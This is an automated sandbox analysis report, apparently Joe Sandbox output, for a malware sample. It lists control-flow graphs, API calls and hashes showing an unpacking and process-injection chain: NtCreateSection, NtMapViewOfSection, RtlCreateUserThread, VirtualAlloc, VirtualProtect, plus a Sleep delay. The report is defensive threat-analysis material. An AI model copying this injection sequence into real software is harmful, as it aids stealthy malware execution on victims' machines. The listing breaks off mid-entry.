3704 2c4a58f 3701->3704 3706 2c4a5aa 3704->3706 3705 2c4a5b3 CreateToolhelp32Snapshot 3705->3706 3707 2c4a5cf Module32First 3705->3707 3706->3705 3706->3707 3708 2c49dee 3707->3708 3709 2c4a5de 3707->3709 3711 2c4a24e 3709->3711 3712 2c4a279 3711->3712 3713 2c4a2c2 3712->3713 3714 2c4a28a VirtualAlloc 3712->3714 3713->3713 3714->3713 3835 402dd0 3836 402ddc 3835->3836 3837 4018e6 8 API calls 3836->3837 3838 402edf 3836->3838 3837->3838 3731 4018f1 3732 4018f6 3731->3732 3733 40192e Sleep 3732->3733 3734 401949 3733->3734 3735 401514 7 API calls 3734->3735 3736 40195a 3734->3736 3735->3736 3822 401915 3823 40191a 3822->3823 3824 4018c6 3822->3824 3825 40192e Sleep 3823->3825 3826 401949 3825->3826 3827 401514 7 API calls 3826->3827 3828 40195a 3826->3828 3827->3828 3715 402f97 3716 4030ee 3715->3716 3717 402fc1 3715->3717 3717->3716 3718 40307c RtlCreateUserThread NtTerminateProcess 3717->3718 3718->3716 3750 2fc0005 3755 2fc092b GetPEB 3750->3755 3752 2fc0030 3757 2fc003c 3752->3757 3756 2fc0972 3755->3756 3756->3752 3758 2fc0049 3757->3758 3759 2fc0e0f 2 API calls 3758->3759 3760 2fc0223 3759->3760 3761 2fc0d90 GetPEB 3760->3761 3762 2fc0238 VirtualAlloc 3761->3762 3763 2fc0265 3762->3763 3764 2fc02ce VirtualProtect 3763->3764 3766 2fc030b 3764->3766 3765 2fc0439 VirtualFree 3769 2fc04be LoadLibraryA 3765->3769 3766->3765 3768 2fc08c7 3769->3768 3812 402d7b 3815 402d38 3812->3815 3813 402dc7 3814 4018e6 8 API calls 3814->3813 3815->3812 3815->3813 3815->3814 3770 2fc0001 3771 2fc0005 3770->3771 3772 2fc092b GetPEB 3771->3772 3773 2fc0030 3772->3773 3774 2fc003c 7 API calls 3773->3774 3775 2fc0038 3774->3775 3737 4014fe 3738 401506 3737->3738 3739 401531 3737->3739 3740 4015c4 NtDuplicateObject 3739->3740 3746 4016e0 3739->3746 3741 4015e1 NtCreateSection 3740->3741 3740->3746 3742 401661 NtCreateSection 3741->3742 3743 401607 NtMapViewOfSection 3741->3743 3745 40168d 3742->3745 3742->3746 3743->3742 3744 40162a NtMapViewOfSection 3743->3744 3744->3742 3747 401648 3744->3747 3745->3746 3748 401697 NtMapViewOfSection 3745->3748 3747->3742 3748->3746 3749 4016be NtMapViewOfSection 3748->3749 3749->3746

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 415ba0-415bc8 2 415bd0-415bd7 0->2 3 415bd9-415bdb 2->3 4 415bdf-415be5 2->4 3->4 5 415be7-415bf1 4->5 6 415bf6-415c00 4->6 5->6 7 415c02-415c0e 6->7 8 415c18-415c1f 6->8 7->8 8->2 9 415c21-415c29 8->9 11 415c30-415c36 9->11 12 415c44-415c4b 11->12 13 415c38-415c3e 11->13 14 415c51-415c58 12->14 15 415c4d 12->15 13->12 14->11 16 415c5a-415c61 14->16 15->14 17 415d90-415d9e 16->17 18 415c67-415d78 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415da0-415dae SetCommState 17->19 22 415d81-415d8d 18->22 23 415d7a-415d7b PulseEvent 18->23 24 415db0-415db7 19->24 25 415db9-415dc0 19->25 22->17 23->22 24->19 24->25 26 415e86-415e95 call 4157f0 25->26 27 415dc6-415e80 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415e97-415ea8 26->33 34 415ecd-415ed8 LoadLibraryA call 415820 26->34 27->26 35 415eb0-415ec0 33->35 40 415edd-415eee call 415b10 34->40 38 415ec2 35->38 39 415ec8-415ecb 35->39 38->39 39->34 39->35 45 415ef0-415ef7 40->45 46 415f03-415f09 45->46 47 415ef9-415eff 45->47 48 415f10-415f17 46->48 49 415f0b call 415810 46->49 47->46 53 415f26-415f2d 48->53 54 415f19-415f20 InterlockedDecrement 48->54 49->48 53->45 56 415f2f-415f3f 53->56 54->53 57 415f40-415f50 56->57 58 415f52 57->58 59 415f59-415f5c 57->59 58->59 59->57 60 415f5e-415f69 59->60 61 415f70-415f75 60->61 62 415f77-415f7d 61->62 63 415f7f-415f85 61->63 62->63 64 415f87-415f94 62->64 63->61 63->64
                                APIs
                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C72
                                • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C8B
                                • FindAtomW.KERNEL32(00000000), ref: 00415C92
                                • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C9A
                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415CB2
                                • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415CD9
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00415CE1
                                • GetVersionExW.KERNEL32(?), ref: 00415CEE
                                • DisconnectNamedPipe.KERNEL32(?), ref: 00415D01
                                • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D46
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D55
                                • LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D6B
                                • PulseEvent.KERNEL32(00000000), ref: 00415D7B
                                • SetCommState.KERNELBASE(00000000,00000000), ref: 00415DA4
                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415DD5
                                • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DE6
                                • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DEE
                                • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415E2E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00415E35
                                • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415E3B
                                • GetBinaryType.KERNEL32(0041742C,?), ref: 00415E4D
                                • LoadLibraryA.KERNELBASE(00417438), ref: 00415ED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                • String ID: k`$}$
                                • API String ID: 2545807588-956986773
                                • Opcode ID: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
                                • Instruction ID: af97c55d7550fca7481f4020956f7819bfbd285186e11878fc050d44ae633f67
                                • Opcode Fuzzy Hash: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
                                • Instruction Fuzzy Hash: 9CA1E371802A24DBC720DB65EC48ADB7F79FF89351F41406AF50AA7150DB385A81CFAD

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 151 401514-401533 153 401524-40152f 151->153 154 401536-40156e call 401193 151->154 153->154 163 401570 154->163 164 401573-401578 154->164 163->164 166 401898-4018a0 164->166 167 40157e-40158f 164->167 166->164 170 4018a5-4018b7 166->170 171 401595-4015be 167->171 172 401896 167->172 178 4018c5 170->178 179 4018bc-4018e3 call 401193 170->179 171->172 180 4015c4-4015db NtDuplicateObject 171->180 172->170 178->179 180->172 182 4015e1-401605 NtCreateSection 180->182 184 401661-401687 NtCreateSection 182->184 185 401607-401628 NtMapViewOfSection 182->185 184->172 188 40168d-401691 184->188 185->184 187 40162a-401646 NtMapViewOfSection 185->187 187->184 190 401648-40165e 187->190 188->172 191 401697-4016b8 NtMapViewOfSection 188->191 190->184 191->172 193 4016be-4016da NtMapViewOfSection 191->193 193->172 196 4016e0 call 4016e5 193->196
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 198 4014fe-401503 199 401531-40156e call 401193 198->199 200 401506-401511 198->200 210 401570 199->210 211 401573-401578 199->211 210->211 213 401898-4018a0 211->213 214 40157e-40158f 211->214 213->211 217 4018a5-4018b7 213->217 218 401595-4015be 214->218 219 401896 214->219 225 4018c5 217->225 226 4018bc-4018e3 call 401193 217->226 218->219 227 4015c4-4015db NtDuplicateObject 218->227 219->217 225->226 227->219 229 4015e1-401605 NtCreateSection 227->229 231 401661-401687 NtCreateSection 229->231 232 401607-401628 NtMapViewOfSection 229->232 231->219 235 40168d-401691 231->235 232->231 234 40162a-401646 NtMapViewOfSection 232->234 234->231 237 401648-40165e 234->237 235->219 238 401697-4016b8 NtMapViewOfSection 235->238 237->231 238->219 240 4016be-4016da NtMapViewOfSection 238->240 240->219 243 4016e0 call 4016e5 240->243
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectView
                                • String ID:
                                • API String ID: 1652636561-0
                                • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 245 401542-40156e call 401193 254 401570 245->254 255 401573-401578 245->255 254->255 257 401898-4018a0 255->257 258 40157e-40158f 255->258 257->255 261 4018a5-4018b7 257->261 262 401595-4015be 258->262 263 401896 258->263 269 4018c5 261->269 270 4018bc-4018e3 call 401193 261->270 262->263 271 4015c4-4015db NtDuplicateObject 262->271 263->261 269->270 271->263 273 4015e1-401605 NtCreateSection 271->273 275 401661-401687 NtCreateSection 273->275 276 401607-401628 NtMapViewOfSection 273->276 275->263 279 40168d-401691 275->279 276->275 278 40162a-401646 NtMapViewOfSection 276->278 278->275 281 401648-40165e 278->281 279->263 282 401697-4016b8 NtMapViewOfSection 279->282 281->275 282->263 284 4016be-4016da NtMapViewOfSection 282->284 284->263 287 4016e0 call 4016e5 284->287
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 289 401549-40156e call 401193 293 401570 289->293 294 401573-401578 289->294 293->294 296 401898-4018a0 294->296 297 40157e-40158f 294->297 296->294 300 4018a5-4018b7 296->300 301 401595-4015be 297->301 302 401896 297->302 308 4018c5 300->308 309 4018bc-4018e3 call 401193 300->309 301->302 310 4015c4-4015db NtDuplicateObject 301->310 302->300 308->309 310->302 312 4015e1-401605 NtCreateSection 310->312 314 401661-401687 NtCreateSection 312->314 315 401607-401628 NtMapViewOfSection 312->315 314->302 318 40168d-401691 314->318 315->314 317 40162a-401646 NtMapViewOfSection 315->317 317->314 320 401648-40165e 317->320 318->302 321 401697-4016b8 NtMapViewOfSection 318->321 320->314 321->302 323 4016be-4016da NtMapViewOfSection 321->323 323->302 326 4016e0 call 4016e5 323->326
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 328 401557 329 40155b-40156e call 401193 328->329 330 40154f-401554 328->330 333 401570 329->333 334 401573-401578 329->334 330->329 333->334 336 401898-4018a0 334->336 337 40157e-40158f 334->337 336->334 340 4018a5-4018b7 336->340 341 401595-4015be 337->341 342 401896 337->342 348 4018c5 340->348 349 4018bc-4018e3 call 401193 340->349 341->342 350 4015c4-4015db NtDuplicateObject 341->350 342->340 348->349 350->342 352 4015e1-401605 NtCreateSection 350->352 354 401661-401687 NtCreateSection 352->354 355 401607-401628 NtMapViewOfSection 352->355 354->342 358 40168d-401691 354->358 355->354 357 40162a-401646 NtMapViewOfSection 355->357 357->354 360 401648-40165e 357->360 358->342 361 401697-4016b8 NtMapViewOfSection 358->361 360->354 361->342 363 4016be-4016da NtMapViewOfSection 361->363 363->342 366 4016e0 call 4016e5 363->366
                                APIs
                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$View$Create$DuplicateObject
                                • String ID:
                                • API String ID: 1546783058-0
                                • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 369 402f97-402fbb 370 402fc1-402fd9 369->370 371 4030ee-4030f3 369->371 370->371 372 402fdf-402ff0 370->372 373 402ff2-402ffb 372->373 374 403000-40300e 373->374 374->374 375 403010-403017 374->375 376 403039-403040 375->376 377 403019-403038 375->377 378 403062-403065 376->378 379 403042-403061 376->379 377->376 380 403067-40306a 378->380 381 40306e 378->381 379->378 380->381 382 40306c 380->382 381->373 383 403070-403075 381->383 382->383 383->371 384 403077-40307a 383->384 384->371 385 40307c-4030eb RtlCreateUserThread NtTerminateProcess 384->385 385->371
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: CreateProcessTerminateThreadUser
                                • String ID:
                                • API String ID: 1921587553-0
                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 386 2c4a58f-2c4a5a8 387 2c4a5aa-2c4a5ac 386->387 388 2c4a5b3-2c4a5bf CreateToolhelp32Snapshot 387->388 389 2c4a5ae 387->389 390 2c4a5c1-2c4a5c7 388->390 391 2c4a5cf-2c4a5dc Module32First 388->391 389->388 390->391 396 2c4a5c9-2c4a5cd 390->396 392 2c4a5e5-2c4a5ed 391->392 393 2c4a5de-2c4a5df call 2c4a24e 391->393 397 2c4a5e4 393->397 396->387 396->391 397->392
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C4A5B7
                                • Module32First.KERNEL32(00000000,00000224), ref: 02C4A5D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C47000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2c47000_mGFoU1INUk.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                • String ID:
                                • API String ID: 3833638111-0
                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction ID: 371ae48abfb3b3b5f63eb2215592bd4d61066d1d862d4d4d888ba815970b7925
                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                • Instruction Fuzzy Hash: B5F09632240B117FD7203BF5AE9CBAF76E8AF89625F100529EA47D24C0DF70E9454A61

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 66 2fc003c-2fc0047 67 2fc004c-2fc0263 call 2fc0a3f call 2fc0e0f call 2fc0d90 VirtualAlloc 66->67 68 2fc0049 66->68 83 2fc028b-2fc0292 67->83 84 2fc0265-2fc0289 call 2fc0a69 67->84 68->67 86 2fc02a1-2fc02b0 83->86 87 2fc02ce-2fc03c2 VirtualProtect call 2fc0cce call 2fc0ce7 84->87 86->87 88 2fc02b2-2fc02cc 86->88 95 2fc03d1-2fc03e0 87->95 88->86 96 2fc0439-2fc04b8 VirtualFree 95->96 97 2fc03e2-2fc0437 call 2fc0ce7 95->97 99 2fc04be-2fc04cd 96->99 100 2fc05f4-2fc05fe 96->100 97->95 104 2fc04d3-2fc04dd 99->104 101 2fc077f-2fc0789 100->101 102 2fc0604-2fc060d 100->102 108 2fc078b-2fc07a3 101->108 109 2fc07a6-2fc07b0 101->109 102->101 105 2fc0613-2fc0637 102->105 104->100 107 2fc04e3-2fc0505 104->107 112 2fc063e-2fc0648 105->112 116 2fc0517-2fc0520 107->116 117 2fc0507-2fc0515 107->117 108->109 110 2fc086e-2fc08be LoadLibraryA 109->110 111 2fc07b6-2fc07cb 109->111 121 2fc08c7-2fc08f9 110->121 114 2fc07d2-2fc07d5 111->114 112->101 115 2fc064e-2fc065a 112->115 118 2fc0824-2fc0833 114->118 119 2fc07d7-2fc07e0 114->119 115->101 120 2fc0660-2fc066a 115->120 124 2fc0526-2fc0547 116->124 117->124 128 2fc0839-2fc083c 118->128 125 2fc07e4-2fc0822 119->125 126 2fc07e2 119->126 127 2fc067a-2fc0689 120->127 122 2fc08fb-2fc0901 121->122 123 2fc0902-2fc091d 121->123 122->123 129 2fc054d-2fc0550 124->129 125->114 126->118 130 2fc068f-2fc06b2 127->130 131 2fc0750-2fc077a 127->131 128->110 132 2fc083e-2fc0847 128->132 134 2fc0556-2fc056b 129->134 135 2fc05e0-2fc05ef 129->135 136 2fc06ef-2fc06fc 130->136 137 2fc06b4-2fc06ed 130->137 131->112 138 2fc0849 132->138 139 2fc084b-2fc086c 132->139 140 2fc056d 134->140 141 2fc056f-2fc057a 134->141 135->104 142 2fc06fe-2fc0748 136->142 143 2fc074b 136->143 137->136 138->110 139->128 140->135 144 2fc057c-2fc0599 141->144 145 2fc059b-2fc05bb 141->145 142->143 143->127 150 2fc05bd-2fc05db 144->150 145->150 150->129
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02FC024D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: cess$kernel32.dll
                                • API String ID: 4275171209-1230238691
                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction ID: 610401f59bd3e033c332991e216635eec9ee6a516276f39422bb654a80fc4d1b
                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                • Instruction Fuzzy Hash: 97525975A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 368 415820-415960 GetModuleHandleW GetProcAddress VirtualProtect
                                APIs
                                • GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158FF
                                • GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 0041593C
                                • VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041595B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProtectVirtual
                                • String ID:
                                • API String ID: 2099061454-3916222277
                                • Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                • Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
                                • Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                • Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 399 2fc0e0f-2fc0e24 SetErrorMode * 2 400 2fc0e2b-2fc0e2c 399->400 401 2fc0e26 399->401 401->400
                                APIs
                                • SetErrorMode.KERNELBASE(00000400,?,?,02FC0223,?,?), ref: 02FC0E19
                                • SetErrorMode.KERNELBASE(00000000,?,?,02FC0223,?,?), ref: 02FC0E1E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction ID: ecccb221eca8afc39b238fc6a573dbfafbac2534b4061c7d54fb180911970f8b
                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                • Instruction Fuzzy Hash: 4AD01231545129B7D7003A94DC09BCD7B1CDF05BA6F108011FB0DD9080CB70954146E5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 402 4018e6-40194b call 401193 Sleep call 40141f 416 40195a-4019a5 call 401193 402->416 417 40194d-401955 call 401514 402->417 417->416
                                APIs
                                • Sleep.KERNELBASE(00001388), ref: 00401936
                                  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143568060.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_mGFoU1INUk.jbxd
                                Similarity
                                • API ID: Section$CreateDuplicateObjectSleepView
                                • String ID:
                                • API String ID: 1885482327-0
                                • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
